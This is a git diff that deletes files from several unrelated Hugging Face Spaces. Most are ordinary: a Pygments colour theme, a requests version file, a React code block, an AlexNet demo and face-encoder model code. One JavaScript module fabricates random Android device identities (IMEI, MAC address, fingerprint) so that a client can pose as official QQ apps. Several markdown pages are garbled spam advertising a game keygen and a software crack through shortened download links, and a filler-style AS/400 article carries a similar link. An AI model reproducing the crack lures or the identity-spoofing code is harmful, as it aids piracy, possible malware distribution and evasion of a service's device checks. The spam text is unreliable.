- See: https://github.com/altercation/solarized - - :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -from pygments.style import Style -from pygments.token import Comment, Error, Generic, Keyword, Name, Number, \ - Operator, String, Token - - -def make_style(colors): - return { - Token: colors['base0'], - - Comment: 'italic ' + colors['base01'], - Comment.Hashbang: colors['base01'], - Comment.Multiline: colors['base01'], - Comment.Preproc: 'noitalic ' + colors['magenta'], - Comment.PreprocFile: 'noitalic ' + colors['base01'], - - Keyword: colors['green'], - Keyword.Constant: colors['cyan'], - Keyword.Declaration: colors['cyan'], - Keyword.Namespace: colors['orange'], - Keyword.Type: colors['yellow'], - - Operator: colors['base01'], - Operator.Word: colors['green'], - - Name.Builtin: colors['blue'], - Name.Builtin.Pseudo: colors['blue'], - Name.Class: colors['blue'], - Name.Constant: colors['blue'], - Name.Decorator: colors['blue'], - Name.Entity: colors['blue'], - Name.Exception: colors['blue'], - Name.Function: colors['blue'], - Name.Function.Magic: colors['blue'], - Name.Label: colors['blue'], - Name.Namespace: colors['blue'], - Name.Tag: colors['blue'], - Name.Variable: colors['blue'], - Name.Variable.Global:colors['blue'], - Name.Variable.Magic: colors['blue'], - - String: colors['cyan'], - String.Doc: colors['base01'], - String.Regex: colors['orange'], - - Number: colors['cyan'], - - Generic: colors['base0'], - Generic.Deleted: colors['red'], - Generic.Emph: 'italic', - Generic.Error: colors['red'], - Generic.Heading: 'bold', - Generic.Subheading: 'underline', - Generic.Inserted: colors['green'], - Generic.Output: colors['base0'], - Generic.Prompt: 'bold ' + colors['blue'], - Generic.Strong: 'bold', - Generic.EmphStrong: 'bold italic', - Generic.Traceback: colors['blue'], - - Error: 'bg:' + colors['red'], - } - - -DARK_COLORS = { - 'base03': '#002b36', - 'base02': '#073642', - 'base01': '#586e75', - 'base00': '#657b83', - 'base0': '#839496', - 'base1': '#93a1a1', - 'base2': '#eee8d5', - 'base3': '#fdf6e3', - 'yellow': '#b58900', - 'orange': '#cb4b16', - 'red': '#dc322f', - 'magenta': '#d33682', - 'violet': '#6c71c4', - 'blue': '#268bd2', - 'cyan': '#2aa198', - 'green': '#859900', -} - -LIGHT_COLORS = { - 'base3': '#002b36', - 'base2': '#073642', - 'base1': '#586e75', - 'base0': '#657b83', - 'base00': '#839496', - 'base01': '#93a1a1', - 'base02': '#eee8d5', - 'base03': '#fdf6e3', - 'yellow': '#b58900', - 'orange': '#cb4b16', - 'red': '#dc322f', - 'magenta': '#d33682', - 'violet': '#6c71c4', - 'blue': '#268bd2', - 'cyan': '#2aa198', - 'green': '#859900', -} - - -class SolarizedDarkStyle(Style): - """ - The solarized style, dark. - """ - - styles = make_style(DARK_COLORS) - background_color = DARK_COLORS['base03'] - highlight_color = DARK_COLORS['base02'] - line_number_color = DARK_COLORS['base01'] - line_number_background_color = DARK_COLORS['base02'] - - -class SolarizedLightStyle(SolarizedDarkStyle): - """ - The solarized style, light. 
- """ - - styles = make_style(LIGHT_COLORS) - background_color = LIGHT_COLORS['base03'] - highlight_color = LIGHT_COLORS['base02'] - line_number_color = LIGHT_COLORS['base01'] - line_number_background_color = LIGHT_COLORS['base02'] diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/requests/__version__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/requests/__version__.py deleted file mode 100644 index 5063c3f8ee7980493efcc30c24f7e7582714aa81..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/requests/__version__.py +++ /dev/null @@ -1,14 +0,0 @@ -# .-. .-. .-. . . .-. .-. .-. .-. -# |( |- |.| | | |- `-. | `-. -# ' ' `-' `-`.`-' `-' `-' ' `-' - -__title__ = "requests" -__description__ = "Python HTTP for Humans." -__url__ = "https://requests.readthedocs.io" -__version__ = "2.31.0" -__build__ = 0x023100 -__author__ = "Kenneth Reitz" -__author_email__ = "me@kennethreitz.org" -__license__ = "Apache 2.0" -__copyright__ = "Copyright Kenneth Reitz" -__cake__ = "\u2728 \U0001f370 \u2728" diff --git a/spaces/pycoming/bingo/src/components/ui/codeblock.tsx b/spaces/pycoming/bingo/src/components/ui/codeblock.tsx deleted file mode 100644 index aabda4e3b59f4e36b6ab79feb19d8d18b70e881b..0000000000000000000000000000000000000000 --- a/spaces/pycoming/bingo/src/components/ui/codeblock.tsx +++ /dev/null @@ -1,142 +0,0 @@ -'use client' - -import { FC, memo } from 'react' -import { Prism as SyntaxHighlighter } from 'react-syntax-highlighter' -import { coldarkDark } from 'react-syntax-highlighter/dist/cjs/styles/prism' - -import { useCopyToClipboard } from '@/lib/hooks/use-copy-to-clipboard' -import { IconCheck, IconCopy, IconDownload } from '@/components/ui/icons' -import { Button } from '@/components/ui/button' - -interface Props { - language: string - value: string -} - -interface languageMap { - [key: string]: string | undefined -} - -export const programmingLanguages: languageMap = { - javascript: '.js', - python: '.py', - java: '.java', - c: '.c', - cpp: '.cpp', - 'c++': '.cpp', - 'c#': '.cs', - ruby: '.rb', - php: '.php', - swift: '.swift', - 'objective-c': '.m', - kotlin: '.kt', - typescript: '.ts', - go: '.go', - perl: '.pl', - rust: '.rs', - scala: '.scala', - haskell: '.hs', - lua: '.lua', - shell: '.sh', - sql: '.sql', - html: '.html', - css: '.css' - // add more file extensions here, make sure the key is same as language prop in CodeBlock.tsx component -} - -export const generateRandomString = (length: number, lowercase = false) => { - const chars = 'ABCDEFGHJKLMNPQRSTUVWXY3456789' // excluding similar looking characters like Z, 2, I, 1, O, 0 - let result = '' - for (let i = 0; i < length; i++) { - result += chars.charAt(Math.floor(Math.random() * chars.length)) - } - return lowercase ? result.toLowerCase() : result -} - -const CodeBlock: FC = memo(({ language, value }) => { - const { isCopied, copyToClipboard } = useCopyToClipboard({ timeout: 2000 }) - - const downloadAsFile = () => { - if (typeof window === 'undefined') { - return - } - const fileExtension = programmingLanguages[language] || '.file' - const suggestedFileName = `file-${generateRandomString( - 3, - true - )}${fileExtension}` - const fileName = window.prompt('Enter file name' || '', suggestedFileName) - - if (!fileName) { - // User pressed cancel on prompt. 
- return - } - - const blob = new Blob([value], { type: 'text/plain' }) - const url = URL.createObjectURL(blob) - const link = document.createElement('a') - link.download = fileName - link.href = url - link.style.display = 'none' - document.body.appendChild(link) - link.click() - document.body.removeChild(link) - URL.revokeObjectURL(url) - } - - const onCopy = () => { - if (isCopied) return - copyToClipboard(value) - } - - return ( -
      -
      - {language} -
      - - -
      -
      - - {value} - -
      - ) -}) -CodeBlock.displayName = 'CodeBlock' - -export { CodeBlock } diff --git a/spaces/pytorch/AlexNet/app.py b/spaces/pytorch/AlexNet/app.py deleted file mode 100644 index 7e6ac40eb1f289cad6ce51bb7c6bb20104fa51d1..0000000000000000000000000000000000000000 --- a/spaces/pytorch/AlexNet/app.py +++ /dev/null @@ -1,55 +0,0 @@ -import os -import torch -import gradio as gr -from PIL import Image -from torchvision import transforms - -torch.hub.download_url_to_file("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg") - -model = torch.hub.load('pytorch/vision:v0.9.0', 'alexnet', pretrained=True) -model.eval() - -# Download ImageNet labels -os.system("wget https://raw.githubusercontent.com/pytorch/hub/master/imagenet_classes.txt") - -def inference(input_image): - - preprocess = transforms.Compose([ - transforms.Resize(256), - transforms.CenterCrop(224), - transforms.ToTensor(), - transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]), - ]) - input_tensor = preprocess(input_image) - input_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model - - # move the input and model to GPU for speed if available - if torch.cuda.is_available(): - input_batch = input_batch.to('cuda') - model.to('cuda') - - with torch.no_grad(): - output = model(input_batch) - # The output has unnormalized scores. To get probabilities, you can run a softmax on it. - probabilities = torch.nn.functional.softmax(output[0], dim=0) - # Read the categories - with open("imagenet_classes.txt", "r") as f: - categories = [s.strip() for s in f.readlines()] - # Show top categories per image - top5_prob, top5_catid = torch.topk(probabilities, 5) - result = {} - for i in range(top5_prob.size(0)): - result[categories[top5_catid[i]]] = top5_prob[i].item() - return result - -inputs = gr.inputs.Image(type='pil') -outputs = gr.outputs.Label(type="confidences",num_top_classes=5) - -title = "ALEXNET" -description = "Gradio demo for Alexnet, the 2012 ImageNet winner achieved a top-5 error of 15.3%, more than 10.8 percentage points lower than that of the runner up. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below." -article = "

      One weird trick for parallelizing convolutional neural networks | Github Repo

      " - -examples = [ - ['dog.jpg'] -] -gr.Interface(inference, inputs, outputs, title=title, description=description, article=article, examples=examples, analytics_enabled=False).launch() \ No newline at end of file diff --git a/spaces/qingjiu11/QQmm/devices/device_8958.js b/spaces/qingjiu11/QQmm/devices/device_8958.js deleted file mode 100644 index 455ddb0108b70276949e6539926481590a98e0d9..0000000000000000000000000000000000000000 --- a/spaces/qingjiu11/QQmm/devices/device_8958.js +++ /dev/null @@ -1,344 +0,0 @@ -"use strict"; -var __importDefault = (this && this.__importDefault) || function (mod) { - return (mod && mod.__esModule) ? mod : { "default": mod }; -}; -Object.defineProperty(exports, "__esModule", { value: true }); -exports.getApkInfo = exports.Platform = exports.Device = exports.generateFullDevice = exports.generateShortDevice = void 0; -const crypto_1 = require("crypto"); -const constants_1 = require("./constants"); -const axios_1 = __importDefault(require("axios")); -const algo_1 = require("./algo"); -function generateImei() { - let imei = `86${(0, constants_1.randomString)(12, '0123456789')}`; - function calcSP(imei) { - let sum = 0; - for (let i = 0; i < imei.length; ++i) { - if (i % 2) { - let j = parseInt(imei[i]) * 2; - sum += j % 10 + Math.floor(j / 10); - } - else { - sum += parseInt(imei[i]); - } - } - return (100 - sum) % 10; - } - return imei + calcSP(imei); -} -/** 生成短设备信息 */ -function generateShortDevice() { - const randstr = (length, num = false) => { - const map = num ? '0123456789' : '0123456789abcdef'; - return (0, constants_1.randomString)(length, map); - }; - return { - "--begin--": "该设备为随机生成,丢失后不能得到原先配置", - product: `ILPP-${randstr(5).toUpperCase()}`, - device: `${randstr(5).toUpperCase()}`, - board: `${randstr(5).toUpperCase()}`, - brand: `${randstr(4).toUpperCase()}`, - model: `ICQQ ${randstr(4).toUpperCase()}`, - wifi_ssid: `HUAWEI-${randstr(7)}`, - bootloader: `U-boot`, - android_id: `IL.${randstr(7, true)}.${randstr(4, true)}`, - boot_id: `${randstr(8)}-${randstr(4)}-${randstr(4)}-${randstr(4)}-${randstr(12)}`, - proc_version: `Linux version 5.10.101-android12-${randstr(8)}`, - mac_address: `2D:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}:${randstr(2).toUpperCase()}`, - ip_address: `192.168.${randstr(2, true)}.${randstr(2, true)}`, - imei: `${generateImei()}`, - incremental: `${randstr(10, true).toUpperCase()}`, - "--end--": "修改后可能需要重新验证设备。" - }; -} -exports.generateShortDevice = generateShortDevice; -/** 生成完整设备信息 */ -function generateFullDevice(apk, d) { - if (!d) - d = generateShortDevice(); - return { - display: d.android_id, - product: d.product, - device: d.device, - board: d.board, - brand: d.brand, - model: d.model, - bootloader: d.bootloader, - fingerprint: `${d.brand}/${d.product}/${d.device}:10/${d.android_id}/${d.incremental}:user/release-keys`, - boot_id: d.boot_id, - proc_version: d.proc_version, - baseband: "", - sim: "T-Mobile", - os_type: "android", - mac_address: d.mac_address, - ip_address: d.ip_address, - wifi_bssid: d.mac_address, - wifi_ssid: d.wifi_ssid, - imei: d.imei, - android_id: (0, constants_1.md5)(d.android_id).toString("hex"), - apn: "wifi", - version: { - incremental: d.incremental, - release: "10", - codename: "REL", - sdk: 29, - }, - imsi: (0, crypto_1.randomBytes)(16), - guid: (0, constants_1.md5)(Buffer.concat([Buffer.from(d.imei), Buffer.from(d.mac_address)])), - }; -} -exports.generateFullDevice = generateFullDevice; -class Device { - 
constructor(apk, d) { - this.apk = apk; - this.secret = 'ZdJqM15EeO2zWc08'; - this.publicKey = `-----BEGIN PUBLIC KEY----- -MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEIxgwoutfwoJxcGQeedgP7FG9 -qaIuS0qzfR8gWkrkTZKM2iWHn2ajQpBRZjMSoSf6+KJGvar2ORhBfpDXyVtZCKpq -LQ+FLkpncClKVIrBwv6PHyUvuCb0rIarmgDnzkfQAqVufEtR64iazGDKatvJ9y6B -9NMbHddGSAUmRTCrHQIDAQAB ------END PUBLIC KEY-----`; - if (!d) - d = generateShortDevice(); - Object.assign(this, generateFullDevice(apk, d)); - } - async getQIMEI() { - if (this.apk.app_key === "") { - return; - } - const k = (0, constants_1.randomString)(16); - const key = (0, algo_1.encryptPKCS1)(this.publicKey, k); - const time = Date.now(); - const nonce = (0, constants_1.randomString)(16); - const payload = this.genRandomPayloadByDevice(); - const params = (0, algo_1.aesEncrypt)(JSON.stringify(payload), k).toString('base64'); - try { - const { data } = await axios_1.default.post("https://snowflake.qq.com/ola/android", { - key, - params, - time, nonce, - sign: (0, constants_1.md5)(key + params + time + nonce + this.secret).toString("hex"), - extra: '' - }, { - headers: { - 'User-Agent': `Dalvik/2.1.0 (Linux; U; Android ${this.version.release}; PCRT00 Build/N2G48H)`, - 'Content-Type': "application/json" - } - }); - if (data?.code !== 0) { - return; - } - const { q16, q36 } = JSON.parse((0, algo_1.aesDecrypt)(data.data, k)); - this.qImei16 = q16; - this.qImei36 = q36; - } - catch { - } - } - genRandomPayloadByDevice() { - const fixedRand = (max = 1, min = 0) => { - if (max < min) - [max, min] = [min, max]; - const diff = max - min; - return Math.floor(Math.random() * diff) + min; - }; - const reserved = { - "harmony": "0", - "clone": Math.random() > 0.5 ? "1" : "0", - "containe": "", - "oz": "", - "oo": "", - "kelong": Math.random() > 0.5 ? "1" : "0", - "uptimes": (0, constants_1.formatTime)(new Date()), - "multiUser": Math.random() > 0.5 ? "1" : "0", - "bod": this.board, - "brd": this.brand, - "dv": this.device, - "firstLevel": "", - "manufact": this.brand, - "name": this.model, - "host": "se.infra", - "kernel": this.fingerprint - }; - const timestamp = Date.now(); - this.mtime = this.mtime || Date.now(); - const mtime1 = new Date(this.mtime || Date.now()); - const dateFormat = (fmt, time = Date.now()) => (0, constants_1.formatTime)(time, fmt); - const mtimeStr1 = dateFormat("YYYY-mm-ddHHMMSS", mtime1) + "." + this.imei.slice(2, 11); - const mtime2 = new Date(this.mtime - parseInt(this.imei.slice(2, 4))); - const mtimeStr2 = dateFormat("YYYY-mm-ddHHMMSS", mtime2) + "." 
+ this.imei.slice(5, 14); - let beaconIdArr = [ - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - mtimeStr1, - '0000000000000000', - (0, constants_1.md5)(this.android_id + this.imei).toString("hex").slice(0, 16), - ...new Array(4).fill(false).map((_) => fixedRand(10000000, 1000000)), - this.boot_id, - '1', - fixedRand(5, 0), - fixedRand(5, 0), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(5, 0), - fixedRand(100, 10), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(50000, 10000), - fixedRand(100, 10), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - mtimeStr2, - fixedRand(10000, 1000), - fixedRand(5, 0), - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((10 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((11 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - fixedRand(10000, 1000), - fixedRand(100, 10), - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((11 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - `${dateFormat("YYYY-mm-ddHHMMSS")}.${String(((11 + parseInt(this.imei.slice(5, 7))) % 100)).padStart(2, "0")}0000000`, - fixedRand(10000, 1000), - fixedRand(5, 0), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(5, 0), - fixedRand(100, 10), - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - `${(0, constants_1.formatTime)(new Date(timestamp + fixedRand(60, 0)))}.${String(fixedRand(99, 0)).padStart(2, '0')}0000000`, - fixedRand(5, 0), - fixedRand(5, 0), - ].map((str, idx) => `k${idx + 1}:${str}`); - return { - "androidId": this.android_id, - "platformId": 1, - "appKey": this.apk.app_key, - "appVersion": this.apk.version, - "beaconIdSrc": beaconIdArr.join(';'), - "brand": this.brand, - "channelId": "2017", - "cid": "", - "imei": this.imei, - "imsi": this.imsi.toString("hex"), - "mac": this.mac_address, - "model": this.model, - "networkType": "unknown", - "oaid": "", - "osVersion": `Android ${this.version.release},level ${this.version.sdk}`, - "qimei": "", - "qimei36": "", - "sdkVersion": "1.2.13.6", - "targetSdkVersion": "26", - "audit": "", - "userId": "{}", - "packageId": this.apk.id, - "deviceType": this.display, - "sdkName": "", - "reserved": JSON.stringify(reserved), - }; - } -} -exports.Device = Device; -/** 支持的登录设备平台 */ -var Platform; -(function (Platform) { - Platform[Platform["Android"] = 1] = "Android"; - Platform[Platform["aPad"] = 2] = "aPad"; - Platform[Platform["Watch"] = 3] = "Watch"; - Platform[Platform["iMac"] = 4] = "iMac"; - Platform[Platform["iPad"] = 5] = "iPad"; - Platform[Platform["Tim"] = 6] = "Tim"; -})(Platform = exports.Platform || (exports.Platform = {})); -const mobile = { - 
id: "com.tencent.mobileqq", - app_key: '0S200MNJT807V3GE', - name: "A8.9.58.11175", - version: "8.9.58.11175", - ver: "8.9.58", - sign: Buffer.from('A6 B7 45 BF 24 A2 C2 77 52 77 16 F6 F3 6E B6 8D'.split(' ').map(s => parseInt(s, 16))), - buildtime: 1684467300, - appid: 16, - subid: 537163194, - bitmap: 150470524, - main_sig_map: 16724722, - sub_sig_map: 0x10400, - sdkver: "6.0.0.2545", - display: "Android_8.9.58", - qua: 'V1_AND_SQ_8.9.58_4108_YYB_D', - ssover: 20, -}; -const tim = { - id: "com.tencent.tim", - app_key: '0S200MNJT807V3GE', - name: "A3.5.1.3168", - version: "3.5.1.3168", - ver: "3.5.1", - sign: Buffer.from('775e696d09856872fdd8ab4f3f06b1e0', 'hex'), - buildtime: 1630062176, - appid: 16, - subid: 537150355, - bitmap: 150470524, - main_sig_map: 16724722, - sub_sig_map: 0x10400, - sdkver: "6.0.0.2484", - display: "Tim", - qua: "V1_AND_SQ_8.3.9_351_TIM_D", - ssover: 18, -}; -const watch = { - id: "com.tencent.qqlite", - app_key: '0S200MNJT807V3GE', - name: "A2.0.8", - version: "2.0.8", - ver: "2.0.8", - sign: Buffer.from('A6 B7 45 BF 24 A2 C2 77 52 77 16 F6 F3 6E B6 8D'.split(' ').map(s => parseInt(s, 16))), - buildtime: 1559564731, - appid: 16, - subid: 537065138, - bitmap: 16252796, - main_sig_map: 16724722, - sub_sig_map: 0x10400, - sdkver: "6.0.0.2365", - display: "Watch", - qua: '', - ssover: 5 -}; -const hd = { - id: "com.tencent.minihd.qq", - app_key: '0S200MNJT807V3GE', - name: "A5.9.3.3468", - version: "5.9.3.3468", - ver: "5.9.3", - sign: Buffer.from('AA 39 78 F4 1F D9 6F F9 91 4A 66 9E 18 64 74 C7'.split(' ').map(s => parseInt(s, 16))), - buildtime: 1637427966, - appid: 16, - subid: 537128930, - bitmap: 150470524, - main_sig_map: 1970400, - sub_sig_map: 66560, - sdkver: "6.0.0.2433", - display: "iMac", - qua: '', - ssover: 12 -}; -const apklist = { - [Platform.Android]: mobile, - [Platform.Tim]: tim, - [Platform.aPad]: { - ...mobile, - subid: 537163242, - display: 'aPad_8.9.58' - }, - [Platform.Watch]: watch, - [Platform.iMac]: { ...hd }, - [Platform.iPad]: { - ...mobile, - subid: 537155074, - sign: hd.sign, - name: '8.9.50.611', - ver: '8.9.50', - sdkver: '6.0.0.2535', - qua: 'V1_AND_SQ_8.9.50_3898_YYB_D', - display: 'iPad' - }, -}; -function getApkInfo(p) { - return apklist[p] || apklist[Platform.Android]; -} -exports.getApkInfo = getApkInfo; diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Command And Conquer 4 Tiberian Twilight !!TOP!! Keygen Generator 136.md b/spaces/quidiaMuxgu/Expedit-SAM/Command And Conquer 4 Tiberian Twilight !!TOP!! Keygen Generator 136.md deleted file mode 100644 index 104fbea9323933e4dc30a141558bcefedf6f8f0a..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Command And Conquer 4 Tiberian Twilight !!TOP!! Keygen Generator 136.md +++ /dev/null @@ -1,17 +0,0 @@ -

      command and conquer 4 tiberian twilight keygen generator 136


      DOWNLOADhttps://geags.com/2uCsCF



      - -This is the first true key generator in Internet October 05, 2014 ... /eb/ 33/17/91/8f/command-and-conquer-4-tiberian-twilight-keygen-generator-136.html ... Tiberian Twilight Keygen Generator ... -Tiberian Twilight Keygen Generator ... -Generator,... -Tiberian Twilight -Tiberian Twilight Keygen Generator Rar. -Tiberian Twilight Keygen Generator Rar ... -Key generator for the game Tiberian Twilight. -Tiberian Twilight Keygen... -Tiberian Twilight Keygen Generator . -Download key generator for game of warfare for free from file sharing -Oct 17 2013 Key generator for the Tiberian Twilight game. -DOWNLOAD ... 8a78ff9644
      -
      -
      -

      diff --git a/spaces/quidiaMuxgu/Expedit-SAM/GSA Search Engine Ranker 13.89 Crack VERIFIED.md b/spaces/quidiaMuxgu/Expedit-SAM/GSA Search Engine Ranker 13.89 Crack VERIFIED.md deleted file mode 100644 index aeb504114363771657fc1673c749cb3f10e8b08b..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/GSA Search Engine Ranker 13.89 Crack VERIFIED.md +++ /dev/null @@ -1,6 +0,0 @@ -

      GSA Search Engine Ranker 13.89 Crack


      Download 🌟 https://geags.com/2uCs7n



      - -All you need to know about Gsa Search Engine Ranker Crack Image gallery. ... #15. GSA Search Engine Ranker 13.89 Crack - Wright Family Archive pic. 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/radames/UserControllableLT-Latent-Transformer/interface/pixel2style2pixel/models/encoders/model_irse.py b/spaces/radames/UserControllableLT-Latent-Transformer/interface/pixel2style2pixel/models/encoders/model_irse.py deleted file mode 100644 index bc41ace0ba04cf4285c283a28e6c36113a18e6d6..0000000000000000000000000000000000000000 --- a/spaces/radames/UserControllableLT-Latent-Transformer/interface/pixel2style2pixel/models/encoders/model_irse.py +++ /dev/null @@ -1,84 +0,0 @@ -from torch.nn import Linear, Conv2d, BatchNorm1d, BatchNorm2d, PReLU, Dropout, Sequential, Module -from models.encoders.helpers import get_blocks, Flatten, bottleneck_IR, bottleneck_IR_SE, l2_norm - -""" -Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) -""" - - -class Backbone(Module): - def __init__(self, input_size, num_layers, mode='ir', drop_ratio=0.4, affine=True): - super(Backbone, self).__init__() - assert input_size in [112, 224], "input_size should be 112 or 224" - assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152" - assert mode in ['ir', 'ir_se'], "mode should be ir or ir_se" - blocks = get_blocks(num_layers) - if mode == 'ir': - unit_module = bottleneck_IR - elif mode == 'ir_se': - unit_module = bottleneck_IR_SE - self.input_layer = Sequential(Conv2d(3, 64, (3, 3), 1, 1, bias=False), - BatchNorm2d(64), - PReLU(64)) - if input_size == 112: - self.output_layer = Sequential(BatchNorm2d(512), - Dropout(drop_ratio), - Flatten(), - Linear(512 * 7 * 7, 512), - BatchNorm1d(512, affine=affine)) - else: - self.output_layer = Sequential(BatchNorm2d(512), - Dropout(drop_ratio), - Flatten(), - Linear(512 * 14 * 14, 512), - BatchNorm1d(512, affine=affine)) - - modules = [] - for block in blocks: - for bottleneck in block: - modules.append(unit_module(bottleneck.in_channel, - bottleneck.depth, - bottleneck.stride)) - self.body = Sequential(*modules) - - def forward(self, x): - x = self.input_layer(x) - x = self.body(x) - x = self.output_layer(x) - return l2_norm(x) - - -def IR_50(input_size): - """Constructs a ir-50 model.""" - model = Backbone(input_size, num_layers=50, mode='ir', drop_ratio=0.4, affine=False) - return model - - -def IR_101(input_size): - """Constructs a ir-101 model.""" - model = Backbone(input_size, num_layers=100, mode='ir', drop_ratio=0.4, affine=False) - return model - - -def IR_152(input_size): - """Constructs a ir-152 model.""" - model = Backbone(input_size, num_layers=152, mode='ir', drop_ratio=0.4, affine=False) - return model - - -def IR_SE_50(input_size): - """Constructs a ir_se-50 model.""" - model = Backbone(input_size, num_layers=50, mode='ir_se', drop_ratio=0.4, affine=False) - return model - - -def IR_SE_101(input_size): - """Constructs a ir_se-101 model.""" - model = Backbone(input_size, num_layers=100, mode='ir_se', drop_ratio=0.4, affine=False) - return model - - -def IR_SE_152(input_size): - """Constructs a ir_se-152 model.""" - model = Backbone(input_size, num_layers=152, mode='ir_se', drop_ratio=0.4, affine=False) - return model diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Big Dummys Guide To The As400 PDF How to Master the Application System400 Operating System.md b/spaces/raedeXanto/academic-chatgpt-beta/Big Dummys Guide To The As400 PDF How to Master the Application System400 Operating System.md deleted file mode 100644 index 8f7a0273affeed8add1bda19566e529c951846c2..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Big Dummys Guide To The 
As400 PDF How to Master the Application System400 Operating System.md +++ /dev/null @@ -1,196 +0,0 @@ -
      -

      Big Dummy's Guide to the AS/400 PDF

      -

      If you are looking for a comprehensive and easy-to-follow guide on how to use the AS/400, you have come to the right place. In this article, you will learn what the AS/400 is, how to get started with it, and where to find more resources on it. Whether you are a beginner or an expert, this guide will help you master the AS/400 in no time.

      -

      What is the AS/400?

      -

      The AS/400, also known as the IBM iSeries or System i, is a family of mid-range business computers that was introduced by IBM in 1988. The AS/400 is designed to run a variety of applications, such as accounting, inventory management, payroll, e-commerce, and more. The AS/400 is known for its reliability, security, scalability, and compatibility with other systems.

      -

      bigdummysguidetotheas400PDF


      Download Zip ○○○ https://tinourl.com/2uL2yx



      -

      A brief history of the AS/400

      -

      The AS/400 was originally developed as a successor to the IBM System/38 and System/36, which were popular in the 1970s and 1980s. The AS/400 inherited many features from these systems, such as the single-level storage model, the integrated database, and the object-oriented architecture. The AS/400 also introduced new features, such as a graphical user interface, a 64-bit processor, and a client-server model.

      -

      Over the years, IBM has released several versions and models of the AS/400, each with improved performance and functionality. The latest version of the AS/400 is called IBM i 7.4, which was released in 2019. The current models of the AS/400 are called IBM Power Systems, which can run multiple operating systems, including IBM i, AIX, and Linux.

      -

      The main features of the AS/400

      -

      The AS/400 has many features that make it a powerful and versatile system for business applications. Some of these features are:

      -
        -
      • The single-level storage model: This means that the AS/400 treats all data as objects, regardless of their type or location. This simplifies data management and access, as well as enhances security and integrity.
      • -
      • The integrated database: This means that the AS/400 has a built-in relational database management system (DBMS) that supports SQL and other query languages. This eliminates the need for external DBMS software and allows for fast and efficient data processing.
      • -
      • The object-oriented architecture: This means that the AS/400 organizes all data and programs into objects that have attributes and methods. This enables modularity, reusability, inheritance, and polymorphism in programming.
      • -
      • The graphical user interface: This means that the AS/400 provides a user-friendly interface that allows users to interact with the system using windows, menus, icons, and mouse clicks. This improves usability and productivity.
      • -
      • The client-server model: This means that the AS/400 can act as both a server and a client in a network environment. This allows for distributed computing, data sharing, remote access, and web services.
      • -
      -

      The benefits of using the AS/400

      -

      The AS/400 has many benefits that make it a desirable system for business applications. Some of these benefits are:

      -
        -
      • The reliability: The AS/400 is known for its high availability and fault tolerance. It can handle heavy workloads without crashing or slowing down. It also has built-in backup and recovery features that prevent data loss.
      • -
      • The security: The AS/400 has multiple layers of security that protect data and programs from unauthorized access or modification. It also supports encryption, authentication, auditing, and firewall functions.
      • -
      • The scalability: The AS/400 can easily adapt to changing business needs by adding or removing hardware or software components. It also supports virtualization and cloud computing technologies that allow for flexible resource allocation.
      • -
      • The compatibility: The AS/400 can interoperate with other systems and platforms using standard protocols and formats. It also supports legacy applications and data formats that were developed for older versions of the system.
      • -
      -

      How to get started with the AS/400

      -

      If you want to learn how to use the AS/400, you will need some basic hardware and software requirements. You will also need to know some basic commands and operations of the system. Finally, you will need to familiarize yourself with some common tasks and functions of the system.

      -

      The hardware and software requirements for the AS/400

      -

      To use the AS/400, you will need:

      -
        -
      • An IBM Power System server: This is where the IBM i operating system and your applications will run. You can choose from different models depending on your budget and performance needs.
      • -
      • An IBM i Access Client Solutions (ACS) software: This is a program that allows you to connect to your server from your PC or mobile device. You can use it to perform various tasks on your server, such as managing files, running queries, debugging programs, etc.
      • -
      • An internet connection: This is required for downloading updates, accessing online resources, or connecting to other servers.
      • -
      -

      The basic commands and operations of the AS/400

      -

To interact with your server using ACS software, you will need to know some basic commands and operations of IBM i. Some of these are:

      -
        -
